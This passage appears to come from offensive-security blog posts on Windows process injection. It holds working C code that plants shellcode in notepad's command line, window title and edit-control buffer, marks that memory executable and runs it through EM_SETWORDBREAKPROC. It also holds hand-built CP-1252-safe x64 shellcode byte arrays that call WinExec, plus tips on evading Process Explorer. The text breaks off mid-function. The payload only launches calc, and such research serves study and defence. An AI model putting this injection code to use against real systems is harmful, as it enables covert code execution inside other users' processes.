// execute shellcode
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);

cleanup:
// cleanup and exit
SetEnvironmentVariable(name, NULL);

if(pi.hProcess != NULL) {
CloseHandle(pi.hProcess);
}
}
```

## 4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

```    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

// create a new process using shellcode as command line
ZeroMemory(&si, sizeof(si));
si.cb          = sizeof(si);
si.dwFlags     = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWDEFAULT;

CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL,
FALSE, 0, NULL, NULL, &si, &pi);
```

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

```// get the address of command line
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
NTSTATUS                    nts;
PROCESS_BASIC_INFORMATION   pbi;
RTL_USER_PROCESS_PARAMETERS upp;
PEB                         peb;
ULONG                       len;
SIZE_T                      rd;

// get the address of PEB
nts = NtQueryInformationProcess(
hp, ProcessBasicInformation,
&pbi, sizeof(pbi), &len);

&peb, sizeof(PEB), &rd);

// get the address of command line
hp, peb.ProcessParameters,
&upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

*cmdlen = upp.CommandLine.Length;
return upp.CommandLine.Buffer;
}
```

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

Figure 2. Command line of new process containing shellcode.

```#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

void cmd_inject(PWCHAR cmd) {
STARTUPINFO         si;
PROCESS_INFORMATION pi;
WCHAR               path[MAX_PATH]={0};
DWORD               rva, old, len;
PVOID               cmdline;
HWND                npw, ecw;

// create a new process using shellcode as command line
ZeroMemory(&si, sizeof(si));
si.cb          = sizeof(si);
si.dwFlags     = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWDEFAULT;

CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL,
FALSE, 0, NULL, NULL, &si, &pi);

// wait for process to initialize
// if you don't wait, there can be a race condition
// reading the correct command line from new process
WaitForInputIdle(pi.hProcess, INFINITE);

// the command to execute is just pasted into the notepad
// edit control.
ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);

// get the address of command line in new process
// which contains our shellcode
cmdline = get_cmdline(pi.hProcess, &len);

// set the address to RWX
VirtualProtectEx(pi.hProcess, cmdline,

// execute shellcode
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);

CloseHandle(pi.hProcess);
}
```

## 5. Window Title

IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesnβt show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

```    // create a new process using shellcode as window title
ZeroMemory(&si, sizeof(si));
si.cb          = sizeof(si);
si.dwFlags     = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWDEFAULT;
si.lpTitle     = (PWCHAR)WINEXEC;
```

## 6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, βReserved for use by the C Run-timeβ and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didnβt point to the data it expected.

While it didnβt work for me, thatβs not to say it canβt work with some additional tweaking. Sources

shellcode_cmd

odzhan

modexp

# Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

## 1. Introduction

βShatter attacksβ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

For this post, Iβve written a PoC that does the following:

• Use the clipboard and WM_PASTE message to inject code into the notepad process.
• Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
• Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. Itβs also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.

## 2. Edit Controls

Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

To show where the edit control input is stored in memory, run notepad and type in βmodexpβ. Attach WinDbg and type in the following command: !address /f:Heap /c:βs -u %1 %2 \βmodexp\ββ. This will search heap memory for the Unicode string βmodexpβ. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

Figure 1. Searching memory for the string in Notepad.

To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

```    hw = FindWindow("Notepad", NULL);
hw = FindWindowEx(hw, NULL, "Edit", NULL);
emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0);
printf("EM Handle : %p\n", emh);
```

Figure 2. The memory pointer returned by EM_GETHANDLE

The handle points to the buffer allocated for input as you can see in Figure 3.

Figure 3. Buffer allocated for input.

Since the input is stored in Unicode format, itβs not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesnβt contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These βbad charactersβ will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.

NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g β\x00\x00β

## 3. Writing CP-1252 Compatible Code

If writing Ansi shellcode that will be converted to Unicode before execution, letβs start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

### 3.1 Initialization

Throughout the code, youβll see the following.

```"\x00\x4d\x00"         /* add   byte [rbp], cl */
```

Consider it a NOP instruction because itβs only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems wonβt cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that weβre not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

```    ; ************************* prolog
mov    al, 0
enter  256, 0

; save rbp
push   rbp

; create local variable for rbp
push   0
push   rsp

pop    rbp
```

If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

```EDITWORDBREAKPROCA EDITWORDBREAKPROCA;

int EDITWORDBREAKPROCA(
LPSTR lpch,
int ichCurrent,
int cch,
int code
)
{...}
```

If youβre familiar with the Microsoft fastcall convention for x64 mode, youβll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

### 3.2 Set RAX to 0

PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

```"\x6a\x00"             /* push  0                   */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

```"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

```"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

```"\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

### 3.3 Set RAX to 1

PUSH 0 creates a local variable weβll call X and assigns a value of 0. PUSH RSP creates a local variable weβll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

```"\x6a\x00"     /* push 0              */
"\x54"         /* push rsp            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\xff\x00"     /* inc  dword [rax]    */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
```

PUSH 0 creates a local variable weβll call X and assigns a value of 0. PUSH RSP creates a local variable weβll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

```"\x6a\x00"         /* push  0              */
"\x54"             /* push  rsp            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xc6\x00\x01"     /* mov   byte [eax], 1  */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
```

### 3.4 Set RAX to -1

PUSH 0 creates a local variable weβll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP \$+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

```"\x6a\x00"         /* push  0              */
"\x59"             /* pop   rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xe2\x00"         /* loop  \$+2            */
"\x34\x00"         /* xor   al, 0          */
"\x51"             /* push  rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
```

PUSH 0 creates a local variable weβll call X and assigns a value of 0. PUSH RSP creates a local variable weβll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.

```"\x6a\x00"     /* push 0                    */
"\x54"         /* push rsp                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x58"         /* pop  rax                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\xff\x00"     /* inc  dword [rax]          */
"\x6b\x00\xff" /* imul eax, dword [rax], -1 */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x59"         /* pop  rcx                  */
```

### 3.5 Load and Store Data

Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.

Letβs take for example setting EAX to 0x12345678.

```"\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */
```

This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.

```"\x6a\x00"                 /* push 0                          */
"\x54"                     /* push rsp                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\xff\x00"                 /* inc  dword [rax]                */
"\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */
```

Create a local variable weβll call X, by storing 0 on the stack. Create a local variable weβll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

```"\x6a\x00"                 /* push   0                      */
"\x54"                     /* push   rsp                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
```

Another way using Rotate Left (ROL).

```"\x68\x00\x78\x00\x34" /* push  0x34007800        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
```

Another example using MOV and ROL.

```"\x68\x00\x56\x00\x12" /* push  0x12005600        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
```

Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.

```"\x6a\x00"             /* push  0                 */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x5f"                 /* pop   rdi               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
"\x00\x27"             /* add   byte [rdi], ah    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x3f"             /* add   byte [rdi], bh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x2f"             /* add   byte [rdi], ch    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x37"             /* add   byte [rdi], dh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
```

### 3.6 Two Byte Instructions

If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

```    ; logic
or al, 0

xor al, 0

and al, 0

; arithmetic

sbb al, 0

sub al, 0

; comparison predicates
cmp al, 0

test al, 0

; data transfer
mov al, 0
mov ah, 0

mov bl, 0
mov bh, 0

mov cl, 0
mov ch, 0

mov dl, 0
mov dh, 0

; branches
jmp \$+2

jo \$+2
jno \$+2

jb \$+2
jae \$+2

je \$+2
jne \$+2

jbe \$+2
ja \$+2

js \$+2
jns \$+2

jp \$+2
jnp \$+2

jl \$+2
jge \$+2

jle \$+2
jg \$+2

jrcxz \$+2

loop \$+2

loope \$+2

loopne \$+2
```

### 3.7 Prefix Codes

Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

Prefix Description
0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
0xF2, 0xF3 REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared.
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but youβll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
0x66, 0x67 Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32.
0x40 β 0x4F REX prefixes for 64-Bit mode.

## 4. Generating Shellcode

Some things to consider when writing your own.

• Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
• Allocate 32 bytes for homespace. This will be used by any API you invoke.
• Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we canβt use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If itβs not aligned by 16 bytes at that point, expect trouble! π

Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.

```// the max address for virtual memory on
// windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF

// only useful for CP_ACP codepage
static
int is_cp1252_allowed(int ch) {

// zero is allowed, but we can't use it for the clipboard
if(ch == 0) return 0;

// bytes converted to double byte characters
if(ch >= 0x80 && ch <= 0x8C) return 0;
if(ch >= 0x91 && ch <= 0x9C) return 0;

return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

// Allocate 64-bit buffer on the stack.
// Then place the address in RDI for writing.

/* 0000 */ "\x6a\x00"             /* push 0                */
/* 0002 */ "\x54"                 /* push rsp              */
/* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
/* 0006 */ "\x5f"                 /* pop  rdi              */
/* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
};

// Load an 8-Bit immediate value into AH

/* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
};

// Subtract 32 from AH
#define SUB_BYTE_SIZE 8

char SUB_BYTE[] = {
/* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
/* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x4d002000 */
};

// Store AH in buffer and advance RDI by 1
#define STORE_BYTE_SIZE 9

char STORE_BYTE[] = {
/* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
/* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
/* 0005 */ "\xae"                 /* scasb                 */
/* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
};

// Transfers control of execution to kernel32!WinExec
#define RET_SIZE 2

char RET[] = {
/* 0000 */ "\xc3" /* ret  */
/* 0002 */ "\x00"
};

#define CALC3_SIZE 164
#define RET_OFS 0x20 + 2

char CALC3[] = {
/* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
/* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
/* 0006 */ "\x55"                     /* push  rbp                   */
/* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
/* 000A */ "\x6a\x00"                 /* push  0                     */
/* 000C */ "\x54"                     /* push  rsp                   */
/* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
/* 0010 */ "\x5d"                     /* pop   rbp                   */
/* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0014 */ "\x57"                     /* push  rdi                   */
/* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0018 */ "\x56"                     /* push  rsi                   */
/* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 001C */ "\x53"                     /* push  rbx                   */
/* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
/* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
/* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
/* 002F */ "\x00\xe5"                 /* add   ch, ah                */
/* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0034 */ "\x51"                     /* push  rcx                   */
/* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0038 */ "\x5b"                     /* pop   rbx                   */
/* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 003C */ "\x6a\x00"                 /* push  0                     */
/* 003E */ "\x54"                     /* push  rsp                   */
/* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0042 */ "\x5f"                     /* pop   rdi                   */
/* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0046 */ "\x57"                     /* push  rdi                   */
/* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 004A */ "\x59"                     /* pop   rcx                   */
/* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 004E */ "\x6a\x00"                 /* push  0                     */
/* 0050 */ "\x54"                     /* push  rsp                   */
/* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0054 */ "\x58"                     /* pop   rax                   */
/* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
/* 005E */ "\x58"                     /* pop   rax                   */
/* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
/* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 006A */ "\xab"                     /* stosd                       */
/* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 006E */ "\x6a\x00"                 /* push  0                     */
/* 0070 */ "\x54"                     /* push  rsp                   */
/* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0074 */ "\x58"                     /* pop   rax                   */
/* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
/* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 007E */ "\x5a"                     /* pop   rdx                   */
/* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0082 */ "\x53"                     /* push  rbx                   */
/* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0086 */ "\x6a\x00"                 /* push  0                     */
/* 0088 */ "\x6a\x00"                 /* push  0                     */
/* 008A */ "\x6a\x00"                 /* push  0                     */
/* 008C */ "\x6a\x00"                 /* push  0                     */
/* 008E */ "\x6a\x00"                 /* push  0                     */
/* 0090 */ "\x53"                     /* push  rbx                   */
/* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0094 */ "\x90"                     /* nop                         */
/* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 0098 */ "\x90"                     /* nop                         */
/* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 009C */ "\x90"                     /* nop                         */
/* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
/* 00A0 */ "\x90"                     /* nop                         */
/* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
};

#define CALC4_SIZE 79
#define RET_OFS2 0x18 + 2

char CALC4[] = {
/* 0000 */ "\x59"                 /* pop  rcx              */
/* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0004 */ "\x59"                 /* pop  rcx              */
/* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0008 */ "\x59"                 /* pop  rcx              */
/* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 000C */ "\x59"                 /* pop  rcx              */
/* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0010 */ "\x59"                 /* pop  rcx              */
/* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0014 */ "\x59"                 /* pop  rcx              */
/* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
/* 001D */ "\x00\xe1"             /* add  cl, ah           */
/* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0022 */ "\x51"                 /* push rcx              */
/* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0026 */ "\x58"                 /* pop  rax              */
/* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
/* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0030 */ "\x59"                 /* pop  rcx              */
/* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0034 */ "\x5b"                 /* pop  rbx              */
/* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0038 */ "\x5e"                 /* pop  rsi              */
/* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 003C */ "\x5f"                 /* pop  rdi              */
/* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0040 */ "\x59"                 /* pop  rcx              */
/* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 0044 */ "\x6a\x00"             /* push 0                */
/* 0046 */ "\x58"                 /* pop  rax              */
/* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 004A */ "\x5c"                 /* pop  rsp              */
/* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
/* 004E */ "\x5d"                 /* pop  rbp              */
};

static
u8* cp1252_generate_winexec(int pid, int *cslen) {
int     i, ofs, outlen;
u8      *cs, *out;
HMODULE m;

// it won't exceed 512 bytes
out = (u8*)cs = VirtualAlloc(
NULL, 4096,
MEM_COMMIT | MEM_RESERVE,

// initialize parameters for WinExec()
